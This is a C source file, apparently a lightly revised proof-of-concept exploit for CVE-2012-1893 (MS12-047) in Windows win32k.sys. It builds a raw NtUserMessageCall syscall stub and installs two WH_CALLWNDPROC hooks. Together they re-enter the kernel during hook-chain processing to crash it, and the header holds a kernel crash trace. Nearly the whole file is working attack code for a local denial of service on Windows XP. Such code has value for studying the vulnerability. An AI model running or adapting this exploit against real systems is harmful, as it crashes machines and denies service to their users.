
  1. #include "stdafx.h"
  2.  
/*
    CVE-2012-1893 MS12-047 LOCAL DoS PoC
    By @d_olex (aka Cr4sh)
    A vulnerability in win32k.sys allows the next hook handler to be called from
    win32k!fnHkINLPCWPRETEXSTRUCT() or win32k!fnHkINLPCWPEXSTRUCT() in an unsafe way.

    Since win32k does not check the type of the next hook, an access violation
    occurs when we try to call the next WH_CALLWNDPROC hook with the arguments
    of the previous WH_CALLWNDPROCRET hook:
    =====================================================================
    Access violation - code c0000005 (!!! second chance !!!)
    win32k!xxxHkCallHook+0x99:
    bf800564 f6402405        test    byte ptr [eax+24h],5
    ChildEBP RetAddr 
    b18d16ac bf8328c5 win32k!xxxHkCallHook+0x99
    b18d1724 bf8f6071 win32k!xxxCallHook2+0x25d
    b18d1740 bf932b6d win32k!xxxCallNextHookEx+0x2d
    b18d176c bf914749 win32k!fnHkINLPCWPRETEXSTRUCT+0x59
    b18d17d8 bf80eef6 win32k!NtUserfnINOUTLPPOINT5+0x5c
    b18d1810 8053d6d8 win32k!NtUserMessageCall+0xae
    b18d1810 0042d65f nt!KiFastCallEntry+0xf8
    0012fa80 0042d6d8 win32k_Hook!_NtUserMessageCall+0xf
    0012fc7c 7e42b372 win32k_Hook!HookHandler_2+0x68
*/
  27.  
/* Window class name and caption of the PoC window. */
#define WND_CLASS "CVE-2012-1893"
#define WND_TITLE "CVE-2012-1893"

/* Initial window size in pixels (the window is centred on the primary screen). */
#define WND_W 500
#define WND_H 500

HINSTANCE m_hInstance = NULL;   /* module handle, set in _tmain before the class is registered */
HWND m_hWnd = NULL;             /* the PoC window; target hwnd of the raw NtUserMessageCall in TRIGGER() */
HHOOK m_hHook_1 = NULL;         /* first thread-local WH_CALLWNDPROC hook, installed on WM_CREATE */
HHOOK m_hHook_2 = NULL;         /* second thread-local WH_CALLWNDPROC hook, installed on WM_CREATE */
  38.  
/*
    System service number of NtUserMessageCall, i.e. the value the raw stub
    below loads into EAX before INT 2Eh. 0x11cc is the Windows XP value; the
    win32k service table is not stable across Windows versions (and may differ
    between service packs), so change it before running the PoC anywhere else.
    The stub refuses to issue the system call while this is 0.
*/
DWORD SDT_NtUserMessageCall = 0x11cc;
  44.  
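/*
    Raw user-mode stub for the NtUserMessageCall system service.

    Hand-rolled instead of going through user32 so the caller controls every
    argument, in particular xpfnProc, the index win32k uses to select the
    message-specific handler (the header trace shows index 11 landing in
    win32k!NtUserfnINOUTLPPOINT5). The seven arguments are passed on the
    stack in declaration order; the stub is naked and, being WINAPI
    (stdcall), pops all 7 * 4 = 0x1c bytes itself.

    Returns whatever the kernel left in EAX, or STATUS_UNSUCCESSFUL
    (0xC0000001) when SDT_NtUserMessageCall is 0, i.e. not configured for
    the running OS.

    Fix: the original failure path loaded 0xc00000001 -- one hex digit too
    many, which does not fit in 32 bits -- so it could never have produced
    the intended NTSTATUS.
*/
__declspec(naked) LRESULT WINAPI _NtUserMessageCall(
    HWND        hwnd,
    UINT        msg,
    WPARAM      wParam,
    LPARAM      lParam,
    ULONG_PTR   xParam,
    DWORD       xpfnProc,
    BOOL        bAnsi)
{
    __asm
    {
        mov     eax, SDT_NtUserMessageCall  ; service number for this OS build
        test    eax, eax
        jz      _failed                     ; 0 means "not set", do not trap
        lea     edx, [esp + 4]              ; EDX -> first stack argument (INT 2Eh convention)
        int     0x2e                        ; legacy system call gate
        retn    0x1c                        ; stdcall: discard 7 DWORD arguments

_failed:
        mov     eax, 0xc0000001             ; STATUS_UNSUCCESSFUL
        retn    0x1c
    }
}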
  68.  
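/*
    Trigger the vulnerability by issuing NtUserMessageCall directly:
      hwnd     = m_hWnd (the PoC window),
      msg      = 0x24 (WM_GETMINMAXINFO),
      lParam   = a zeroed 0x100-byte buffer, handed to the kernel as the
                 message parameter (an in/out pointer, judging by the
                 NtUserfnINOUTLPPOINT5 handler name in the header trace),
      xParam   = 0,
      xpfnProc = 11 (the original spelled it 17 - 6), the handler index the
                 header trace shows reaching fnHkINLPCWPRETEXSTRUCT and then
                 xxxCallNextHookEx.

    Expanded inside the WH_CALLWNDPROC hook procedures so the call happens
    while the hook chain is being walked. Wrapped in do { } while (0) so it
    is a single statement wherever it is used (e.g. as an if-body); the
    buffer only needs to live for the duration of the call.
*/
#define TRIGGER()                                                               \
    do {                                                                        \
        char Something[0x100];                                                  \
        ZeroMemory(Something, sizeof(Something));                               \
        _NtUserMessageCall(m_hWnd, 0x24, 0, (LPARAM)Something, 0, 11, FALSE);   \
    } while (0)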
  75.  
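/*
    First WH_CALLWNDPROC hook procedure (installed by WndProc on WM_CREATE).

    Each time it runs it re-enters win32k through the raw NtUserMessageCall
    stub (TRIGGER) while the hook chain is still being walked, which is what
    drives xxxCallNextHookEx into the unchecked next-hook call described in
    the file header. The event is then passed on to the next hook, as the
    hook API requires.

    nCode, wParam, lParam: standard CallWndProc hook arguments, forwarded
    unchanged. nCode < 0 is forwarded without processing, per the hook contract.
*/
LRESULT CALLBACK HookHandler_1(int nCode, WPARAM wParam, LPARAM lParam)
{
    /* "%s" form: works on compilers where __FUNCTION__ is not a string
       literal and cannot be concatenated. Output is unchanged. */
    printf("%s()\n", __FUNCTION__);

    if (nCode >= 0)
    {
        TRIGGER();
    }

    return CallNextHookEx(m_hHook_1, nCode, wParam, lParam);
}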
  84.  
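/*
    Second WH_CALLWNDPROC hook procedure (installed by WndProc on WM_CREATE
    after HookHandler_1, so it is the one win32k calls first).

    Behaves exactly like HookHandler_1: re-enters win32k through the raw
    NtUserMessageCall stub (TRIGGER) while the hook chain is active -- the
    header trace shows the kernel fault originating from this handler --
    then forwards the event to the next hook.

    nCode, wParam, lParam: standard CallWndProc hook arguments, forwarded
    unchanged. nCode < 0 is forwarded without processing, per the hook contract.
*/
LRESULT CALLBACK HookHandler_2(int nCode, WPARAM wParam, LPARAM lParam)
{
    /* "%s" form: works on compilers where __FUNCTION__ is not a string
       literal and cannot be concatenated. Output is unchanged. */
    printf("%s()\n", __FUNCTION__);

    if (nCode >= 0)
    {
        TRIGGER();
    }

    return CallNextHookEx(m_hHook_2, nCode, wParam, lParam);
}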
  93.  
/* WM_COMMAND id handled in WndProc (shows a message box). Nothing in this
   listing sends it -- no menu or accelerator is created -- so it looks like
   leftover scaffolding. */
#define ID_SHOWMSG 1
  95.  
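/*
    Install the two thread-local WH_CALLWNDPROC hooks on the current thread.
    hMod is NULL because the hook procedures live in this process and the
    hook is not global. Failures are reported but not fatal: the window is
    still created, the PoC simply will not trigger.
*/
static void InstallHooks(void)
{
    m_hHook_1 = SetWindowsHookEx(WH_CALLWNDPROC, HookHandler_1, NULL, GetCurrentThreadId());
    if (m_hHook_1 == NULL)
    {
        /* GetLastError() is a DWORD; %lu is the matching conversion. */
        printf("SetWindowsHookEx() ERROR %lu\n", (unsigned long)GetLastError());
    }

    m_hHook_2 = SetWindowsHookEx(WH_CALLWNDPROC, HookHandler_2, NULL, GetCurrentThreadId());
    if (m_hHook_2 == NULL)
    {
        printf("SetWindowsHookEx() ERROR %lu\n", (unsigned long)GetLastError());
    }
}

/* Remove whichever hooks were installed; the original never unhooked. */
static void RemoveHooks(void)
{
    if (m_hHook_2 != NULL)
    {
        UnhookWindowsHookEx(m_hHook_2);
        m_hHook_2 = NULL;
    }
    if (m_hHook_1 != NULL)
    {
        UnhookWindowsHookEx(m_hHook_1);
        m_hHook_1 = NULL;
    }
}

/*
    Window procedure of the PoC window.

    WM_CREATE  installs the hooks (returns 0 so creation continues).
    WM_COMMAND shows a message box for ID_SHOWMSG.
    WM_DESTROY removes the hooks and posts WM_QUIT to end the message loop.
    Everything else goes to DefWindowProc.
*/
LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam)
{
    switch (message)
    {
    case WM_CREATE:
        InstallHooks();
        return 0;

    case WM_COMMAND:
        /* Fix: the command id is in LOWORD(wParam); HIWORD carries the
           notification code, so switching on the whole wParam could miss
           the id whenever a notification code is present. */
        if (LOWORD(wParam) == ID_SHOWMSG)
        {
            MessageBoxA(0, __FUNCTION__, "", 0);
        }
        return 0;

    case WM_DESTROY:
        RemoveHooks();
        PostQuitMessage(0);
        return 0;

    default:
        return DefWindowProc(hWnd, message, wParam, lParam);
    }
}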
  153.  
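/*
    Register the PoC window class. Returns TRUE on success; on failure the
    error is printed and FALSE is returned.
    Note: RegisterClassEx returns an ATOM, so failure is 0, not NULL.
*/
static BOOL RegisterMainClass(void)
{
    WNDCLASSEX wcex;
    ZeroMemory(&wcex, sizeof(wcex));
    wcex.cbSize = sizeof(WNDCLASSEX);
    wcex.style = CS_HREDRAW | CS_VREDRAW;
    wcex.lpfnWndProc = WndProc;
    wcex.hInstance = m_hInstance;
    wcex.lpszClassName = _T(WND_CLASS);
    wcex.hbrBackground = (HBRUSH)(COLOR_WINDOW + 1);

    if (RegisterClassEx(&wcex) == 0)
    {
        printf("RegisterClassEx() ERROR %lu\n", (unsigned long)GetLastError());
        return FALSE;
    }
    return TRUE;
}

/*
    Create the (empty) PoC window centred on the primary screen. Returns the
    window handle, or NULL after printing the error. Creating the window
    delivers WM_CREATE to WndProc, which installs the hooks.
*/
static HWND CreateMainWindow(void)
{
    int x = (GetSystemMetrics(SM_CXSCREEN) - WND_W) / 2;
    int y = (GetSystemMetrics(SM_CYSCREEN) - WND_H) / 2;

    HWND hWnd = CreateWindowEx(
        WS_EX_CLIENTEDGE,
        _T(WND_CLASS), _T(WND_TITLE),
        WS_OVERLAPPEDWINDOW,
        x, y, WND_W, WND_H,
        NULL, NULL,
        m_hInstance,
        NULL
    );
    if (hWnd == NULL)
    {
        printf("CreateWindow() ERROR %lu\n", (unsigned long)GetLastError());
    }
    return hWnd;
}

/*
    Entry point.

    1. Issues the raw NtUserMessageCall once against the desktop window with
       no hooks installed. The original does not say why; presumably a
       sanity check that the stub / service number work before going further.
    2. Registers the window class, creates the window (whose WM_CREATE
       handler installs the WH_CALLWNDPROC hooks) and pumps messages. Every
       message delivered to the window walks the hook chain, where the hook
       procedures fire TRIGGER(); on a vulnerable system the kernel faults
       in win32k!xxxHkCallHook (see the header trace).

    On the normal exit path ExitProcess(0) is called directly, so the
    "Press any key" prompt is only reached when setup fails.

    Fix: the original reached the `end:` label via a goto that jumped over the
    initialisation of `x` and `y`; restructured as plain if-nesting, which is
    valid in both C and C++. GetMessage() returns -1 on error, which the
    original loop treated as "keep going"; the loop now stops on <= 0.
*/
int _tmain(int argc, _TCHAR* argv[])
{
    char Something[0x100];
    MSG Msg;

    (void)argc;
    (void)argv;

    ZeroMemory(Something, sizeof(Something));
    _NtUserMessageCall(GetDesktopWindow(), 0x24, 0, (LPARAM)Something, 0, 11, FALSE);

    m_hInstance = (HINSTANCE)GetModuleHandle(NULL);

    if (RegisterMainClass())
    {
        m_hWnd = CreateMainWindow();
        if (m_hWnd != NULL)
        {
            ShowWindow(m_hWnd, SW_SHOWNORMAL);
            UpdateWindow(m_hWnd);

            /* Main message loop; > 0 excludes both WM_QUIT (0) and error (-1). */
            while (GetMessage(&Msg, NULL, 0, 0) > 0)
            {
                TranslateMessage(&Msg);
                DispatchMessage(&Msg);
            }

            ExitProcess(0);
        }
    }

    printf("Press any key to quit...\n");
    _getch();

    return 0;
}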

